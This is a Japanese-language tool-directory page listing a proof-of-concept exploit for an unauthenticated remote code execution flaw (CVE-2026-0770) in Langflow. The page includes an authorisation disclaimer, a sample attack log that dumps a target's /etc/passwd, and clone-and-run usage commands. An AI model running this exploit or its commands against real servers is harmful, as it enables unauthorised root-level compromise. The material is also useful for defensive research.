Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-0770 — LangFlow RCE | CVE-2026-0770 | 概念実証 | Kitploit
ツール/GitHubGitHub/ez4rd1x1/cve-2026-0770
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育レッドチーミング
GitHubez4rd1x1/cve-2026-0770

CVE-2026-0770

LangFlow RCE | CVE-2026-0770 | 概念実証

リポジトリを見る
3ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-0770: Langflow exec_globals 認証不要のリモートコード実行 (PoC)

CVE Score: 9.8 Python Version

CVE-2026-0770 は、Langflow に影響を与える認証不要のリモートコード実行 (RCE) 脆弱性です。

この欠陥は、/validate エンドポイントに提供される exec_globals パラメータの処理における不適切な入力検証に起因します。これを悪用することで、攻撃者は検証ルーチン中に信頼されていないグローバル環境を渡すことができ、root ユーザーのコンテキストでリモートコード実行を達成します。


[!] 免責事項

警告: このツールは、許可されたセキュリティテスト、教育目的、防御研究のみを目的としています。所有していない、または明示的な書面による許可を得ていないターゲットに対して実行しないでください。作者は、このスクリプトの誤用または損害について一切の責任を負いません。


脆弱性の詳細

  • CVE ID: CVE-2026-0770
  • 脆弱性タイプ: 信頼されていないコントロールスフィアからの機能の組み込み (CWE-829) / コードインジェクション
ツールをダウンロード
  • 影響を受けるソフトウェア: Langflow (パッチ前のバージョン)
  • 影響: システム全体の侵害 (root としての RCE)
  • 必要な権限: なし (認証不要)

  • 出力

    root@kitploit:~
    
    ======================================================================
               Langflow RCE Exploit - CVE-2026-0770 - Zardy1x1            
    ======================================================================
    Target : http://192.168.1.9:7860
    Command: cat /etc/passwd
    ======================================================================
    [*] attempt login...
    [+] auto-login successful!
    [~] token acquired: eyJhbGciOiJIUzI1NiIs...
    [*] target command: cat /etc/passwd
    [~] payload contructed
    [~] sending request to http://192.168.1.9:7860/api/v1/validate/code
    [*] receive status code: 200
    
    ======================================================================
    COMMAND OUTPUT
    ======================================================================
    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
    bin:x:2:2:bin:/bin:/usr/sbin/nologin
    sys:x:3:3:sys:/dev:/usr/sbin/nologin
    sync:x:4:65534:sync:/bin:/bin/sync
    games:x:5:60:games:/usr/games:/usr/sbin/nologin
    man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
    lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
    mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
    news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
    uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
    proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
    www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
    backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
    list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
    irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
    _apt:x:42:65534::/nonexistent:/usr/sbin/nologin
    nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
    user:x:1000:0::/app/data:/bin/sh
    systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
    systemd-timesync:x:997:997:systemd Time Synchronization:/:/usr/sbin/nologin
    messagebus:x:996:996:System Message Bus:/nonexistent:/usr/sbin/nologin
    ======================================================================
    
    Status Code : 200
    Response Size: 1244 bytes
    

    インストールと使用方法

    root@kitploit:~
    git clone https://github.com/Ez4rd1x1/CVE-2026-0770
    cd CVE-2026-0770
    python3 exp_v3.py -t http://target:port -c "cat /etc/passwd"